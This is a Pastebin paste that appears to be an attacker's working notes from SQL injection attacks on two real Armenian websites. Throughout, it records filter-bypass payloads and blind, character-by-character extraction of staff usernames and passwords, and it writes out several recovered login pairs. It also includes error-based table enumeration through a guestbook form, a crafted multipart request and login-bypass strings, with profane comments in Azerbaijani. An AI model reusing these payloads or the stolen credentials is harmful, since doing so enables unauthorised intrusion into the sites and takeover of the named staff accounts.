Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://itpark.am/firm.php?lang=us&id=sleep%281%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%206%20not%20in%20%28%279999999999%27%29
- http://itpark.am/firm.php?lang=us&id=-9%20or%20@@version_compile_os%20NOT%20in%20%28%27win32%27%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%273%27%29%20And%20%27aAaAaA%27!=%27A%27
- (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))--
- %01 bypass edir
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20table_name%29%29%20AND%208-1=7
- bypass: http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%201%0D%0A%0D%0A%0D%01FROM%0D%0A%0D%0A%0D%0A1%29%29%29%20AND%208-1=7
- BYPASS FROM:
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20NULL,%0D%0D%0D%0D%0D%0dNULL,%0d%0a%20%20%27%TRUE%27%20from%0Ddual%29%29%20AND%208-1=7
- SELECT firms.title_us AS title, firms.address_us AS address, firms.content_us AS description, firms.phone, firms.phone2, firms.fax, firms.email, firms.URL, GROUP_CONCAT(floors.building_code, floors.floor, '', room ORDER BY floors.building_code, floors.floor, CAST(room AS UNSIGNED) SEPARATOR ', №') AS rooms_list, SUM(rooms.area) as total_area FROM firms INNER JOIN rooms ON rooms.firm_id=firms.id INNER JOIN floors ON floors.id = rooms.floor_id WHERE firms.id=-1 or @@version_compile_os NOT in ((select NULL, NULL, '%TRUE' from dual)) AND 8-1=7 GROUP BY firms.id:Operand should contain 1 column(s)
- firms
- rooms
- news
- services
- rent
- staff
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
- error based: http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60user_name%60%29%20%0D%20from%0D%60staff%60%29
- column: password:
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60password%60%29%20%0D%20from%0D%60staff%60%29
- http://itpark.am/firm.php?lang=us&id=-1%20AnD%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
- bypassed!!!
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
- 3 user var:
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29!=%27%27
- 3 got bala var burda: http://itpark.am/index.php?lang=us&go=staff
- 3-cu userin parolunun
- ------------------------------------------------------
- 1ci simvolu:
- v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- ------------------------------------------------------
- 2-ci simvolu: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- ------------------------------------------------------
- 3-cu simvolu: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- ------------------------------------------------------
- 4-cu simvolu: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- ------------------------------------------------------
- 5-ci simvolu: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- ------------------------------------------------------
- 6-ci simvol: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- ------------------------------------------------------
- 7-ci simvol: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 8-ci simvol: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- anasini sikdiyim deyesen vardanvardan tipli pass istifade edir.
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- 9-cu simvol: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 10-cu simvol: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 11-ci simvol: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 12-ci simvol: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- --------------------------------------------------------
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,13,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27%27
- vardanvardan
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=0x76617264616E76617264616E
- --------------------------------------------------------
- vardan gotbalanin *deqiq* user name -ini cekek:
- --------------------------------------------------------
- 1-ci simvol: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 2: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 3: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 4: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 5: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 6: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- --------------------------------------------------------
- 7-ci simvol: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 8: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 9: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 10: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 11: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 12: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- //true
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27vardanvardan%27
- login: vardanvardan
- pass: vardanvardan
- login olmur! disabled account?
- =====================================================================
- =====================================================================
- offset 0 daki userin loginini cekek:
- 1: g
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27g%27
- =====================================================================
- 2: k
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
- =====================================================================
- 3: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 4: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
- =====================================================================
- 5: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 6: p
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
- =====================================================================
- 7: e
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
- =====================================================================
- 8: t
- =====================================================================
- 9: y
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
- =====================================================================
- 10: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 11: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
- =====================================================================
- 12: bosdur
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27gkarapetyan%27
- offset 0
- gkarapetyan
- passi cekek:
- ============================
- 1: k
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
- ============================
- 2: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 3: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
- ============================
- 4: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 5: p
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
- ============================
- 6: e
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
- ============================
- 7: t
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27t%27
- ============================
- 8: y
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
- ============================
- 9: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 10: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
- ============================
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x676B61726170657479616E
- hex('gkarapetyan') |
- -----------------------+
- 676B61726170657479616E |
- -----------------------+
- row in set (0.00 sec)
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x6B61726170657479616E
- hex('karapetyan') |
- ----------------------+
- 6B61726170657479616E |
- ----------------------+
- gkarapetyan
- karapetyan
- offset 1
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27s%27
- pass: sergeysergey
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,20%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27sergeysergey%27
- or (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
- http://www.armenian-guides.am/index.php?lang=us&go=guestbook
- 1' and 1 not like 'aaaaaaaaaaaa
- insert into guestbook (comment, URL) values ('\', 'xxxxxxxxxxxxx'):You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '84.32.10.231')' at line 1
- ',version())-- AND 3!=('3
- ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3
- (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- GUESTBOOK
- insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):
- Duplicate entry 'about|5.0.901' for key 1
- limit 2,1
- '84.32.10.231'):Duplicate entry 'armenia|5.0.901' for key 1
- 'be_member|5.0.901' fo
- become
- beforehand
- bylaws
- code
- contacts
- guestbook
- languages
- library
- links
- literature
- member_only
- news
- persons
- survey1
- trainings
- websites
- words
- insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='password' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):Duplicate entry 'persons|5.0.901' for key 1
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="go"\r\n
- \r\n
- guestbook\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="sub"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="act"\r\n
- \r\n
- save\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="lang"\r\n
- \r\n
- us\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="username"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="password"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="comment"\r\n
- \r\n
- ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='username' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3\r\n
- -----------------------------3691302952036--\r\n
- persons table-inda columnlar:
- entry 'PersonID|agg@localhost1' for key 1
- FirstName_am
- FirstName_ru
- FirstName_us
- FirstName_de
- FirstName_fr
- Password
- UserName
- MEMBER ONLY ACCESS
- select * from persons where UserName='\' and Password='':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' and Password=''' at line 1
- select * from persons where UserName=''' and Password=''
- login:\
- pass: or username=(select username from persons limit 1) and password=(select password from persons limit 1)-- and 3='3
- bypass:
- login: ' or 5=5-- and 3='3
- pass: \
- ' or username=(select username from persons limit 1 offset 1)-- and 3='3-- and 3='3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement